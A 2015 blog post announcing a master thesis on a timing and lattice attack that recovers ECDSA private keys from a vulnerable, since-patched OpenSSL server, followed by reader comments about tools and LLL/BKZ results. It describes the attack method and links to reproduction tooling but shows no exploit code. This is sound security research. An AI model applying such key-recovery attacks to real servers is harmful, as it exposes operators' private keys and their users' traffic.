Timing and Lattice Attacks on a Remote ECDSA OpenSSL Server: How Practical Are They Really? posted August 2015
Alright! My master thesis is done. Here's a download link
It's a timing attack on an vulnerable version of OpenSSL. In particular its ECDSA signature with binary curves.
There was an optimization right before the constant-time scalar multiplication of the nonce with the public point. That leads to a timing attack that leaks the length of the ephemeral keys of an Openssl server's signatures.
In this paper I explain how to setup such an attack, how to use lattices to recover the private key out of just knowing the lengths of the nonces of a bunch of signatures taken during an ephemeral handshake.
If this doesn't make sense to you just read the paper :D
Also everything is on this github repo. You can reproduce my setup for a vulnerable server and an attacker. Patch and tools are there. If you end up getting better results than the ones in the paper, well tell me!
Also here's a demo:
EDIT: it's on the ePrint archive as well now.
Comments
cq
how about the latest openssl.
david
it is patched! Look at my paper :P
cq
thanks.how about the get_small_nonces_data.py,may be missed. :)
cq
btw,which paper,u mention in LLL video about tsinghua university,can u give a link~thanks
david
I just added it in `tools/`!
I have a bunch of other tools and readmes on how to make the plots, maybe I should upload that.
as for the tsinghua paper, check my paper here: https://github.com/mimoo/RSA-and-LLL-attacks/blob/master/survey_final.pdf
But I might not talk about it there, if not I don't know where you can find that other than looking in the eprint of IACR for boneh and durfee
david
found it: Remarks on the bounds for cryptanalysis of low private key RSA (2008)
cq
yeap.
how about LLL compare to other method or algorithm. for example target rsa-150.
time cost,bla bla....
david
why would someone test rsa-150? (You mean rsa with modulus of 150bits?)
I don't really understand your question, there are some numbers in my paper. It would be interesting to see if BKZ has better results (although when I was testing it seemed to have the same results for the RSA attack)
cq
i mean https://en.wikipedia.org/wiki/RSA_numbers
david
I don't think LLL and BKZ are very relevant to factorization contests
the attack applies if the private key is small
cq
On my ubuntu local,it always run with result -trick(1000 | 10000 | 100000). i guess it's not that practical.
Also only solved when length=157.And when trick should be 6,when 7.
i guess may be i should try older version.like 0.9.8.
leave a comment...